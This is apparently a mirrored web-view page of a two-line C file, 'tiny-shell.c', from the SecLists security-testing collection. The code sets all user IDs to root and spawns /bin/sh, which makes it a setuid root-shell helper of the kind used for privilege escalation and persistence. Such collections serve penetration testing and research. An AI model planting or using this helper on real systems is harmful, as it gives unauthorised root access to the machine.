mirror of
https://github.com/danielmiessler/SecLists
synced 2025-12-06 17:03:31 +01:00
2 lines
76 B
C
2 lines
76 B
C
// $ gcc tiny-shell.c
|
|
int main(void){setresuid(0, 0, 0);system("/bin/sh");}
|